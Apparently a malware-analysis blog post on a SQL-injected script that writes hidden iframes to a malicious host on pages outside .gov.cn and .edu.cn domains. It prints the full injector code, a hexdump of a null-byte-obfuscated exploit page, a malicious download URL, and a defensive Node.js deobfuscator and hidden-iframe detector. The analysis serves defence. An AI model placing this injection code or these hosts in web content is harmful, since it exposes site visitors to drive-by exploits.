3b3.org/c.js
This SQL-injected script src has been around for some time.
The interesting point of this script is that it behaves differently if the injected site is on a “.gov.cn” or “.edu.cn” domain: the hidden iframe is only written into pages outside those two domains. Code as shown below:
var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));   // host part of the page URL (after "http://")
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;   // .gov.cn / .edu.cn host: nothing is injected
        break;
    }
}
if(tmpdomain == 0){
    document.writeln("<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></iframe>");
    function rl()
    {
        var msgObj = document.createElement("div");
        msgObj.setAttribute("id","msgDiv");
        document.body.appendChild(msgObj);
        var obj = document.getElementById("msgDiv");
        obj.innerHTML ="<iframe src=http://33sf54.cn/sina/a100.htm width=0 height=0></iframe>";
    }
    setInterval("rl()",10000);   // re-insert the hidden iframe every 10 seconds
}
The injected iframe a100.htm in turn loads another iframe, au.htm.
au.htm uses another obfuscation technique: null bytes are scattered throughout the file. The top portion of the file (hexdump output) is shown below:
00000000 3c 00 00 68 00 74 00 6d 6c 3e 00 00 0d 0a 00 00 |<..h.t.ml>......|
00000010 3c 00 00 73 00 00 63 72 00 69 00 00 70 00 00 74 |<..s..cr.i..p..t|
00000020 00 3e 00 00 0d 00 00 0a 69 00 00 66 00 28 00 6e |.>......i..f.(.n|
00000030 00 00 61 76 00 69 00 67 61 00 74 00 6f 72 2e 00 |..av.i.ga.t.or..|
00000040 00 75 00 00 73 00 65 00 00 72 00 00 41 67 00 00 |.u..s.e..r..Ag..|
00000050 65 00 00 6e 74 00 2e 74 00 00 6f 00 00 4c 6f 00 |e..nt..t..o..Lo.|
00000060 77 65 72 00 00 43 61 73 65 00 28 29 00 00 2e 00 |wer..Case.()....|
If all the 00 bytes are removed, you get back a clean HTML file.
au.htm contains links to exploits for typical vulnerabilities. One malicious file that will be downloaded is http://xia8866.com/xia/f5.css (see the ThreatExpert result).
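As an added example (not code from the post or from the injected scripts), the Node.js snippet below rebuilds the null-byte-padded au.htm from the hexdump excerpt above and flags the zero-size iframes that c.js writes into pages; the hexdump sample is constructed from the seven lines shown, and parseHexdump, stripNulls and findHiddenIframes are names chosen here.

```javascript
// Constructed sample: the first seven `hexdump -C` lines of au.htm as shown in the post.
const HEXDUMP_SAMPLE = [
  "00000000 3c 00 00 68 00 74 00 6d 6c 3e 00 00 0d 0a 00 00 |<..h.t.ml>......|",
  "00000010 3c 00 00 73 00 00 63 72 00 69 00 00 70 00 00 74 |<..s..cr.i..p..t|",
  "00000020 00 3e 00 00 0d 00 00 0a 69 00 00 66 00 28 00 6e |.>......i..f.(.n|",
  "00000030 00 00 61 76 00 69 00 67 61 00 74 00 6f 72 2e 00 |..av.i.ga.t.or..|",
  "00000040 00 75 00 00 73 00 65 00 00 72 00 00 41 67 00 00 |.u..s.e..r..Ag..|",
  "00000050 65 00 00 6e 74 00 2e 74 00 00 6f 00 00 4c 6f 00 |e..nt..t..o..Lo.|",
  "00000060 77 65 72 00 00 43 61 73 65 00 28 29 00 00 2e 00 |wer..Case.()....|",
].join("\n");

// Turn `hexdump -C` style lines (offset, up to 16 hex bytes, |ascii| column) back into bytes.
function parseHexdump(text) {
  const bytes = [];
  for (const line of text.split("\n")) {
    const m = /^[0-9a-f]+\s+((?:[0-9a-f]{2}\s+)+)/i.exec(line);
    if (!m) continue; // skips blank lines and hexdump's "*" repeat markers
    for (const hex of m[1].trim().split(/\s+/)) bytes.push(parseInt(hex, 16));
  }
  return Buffer.from(bytes);
}

// The obfuscation is pure padding: dropping every 0x00 byte restores the original HTML.
function stripNulls(buf) {
  return Buffer.from(buf.filter((b) => b !== 0)).toString("latin1");
}

// Return the src of every iframe sized to be invisible (width=0 or height=0),
// the pattern c.js injects, so the hosts can be triaged or blocklisted.
function findHiddenIframes(html) {
  const hits = [];
  const tag = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tag.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^\s"'>]+)/i.exec(m[1]);
    const zeroSized = /\b(?:width|height)\s*=\s*["']?0(?:px)?\b/i.test(m[1]);
    if (src && zeroSized) hits.push(src[1]);
  }
  return hits;
}

// Demo on the constructed sample: prints the recovered start of au.htm.
console.log(JSON.stringify(stripNulls(parseHexdump(HEXDUMP_SAMPLE))));
```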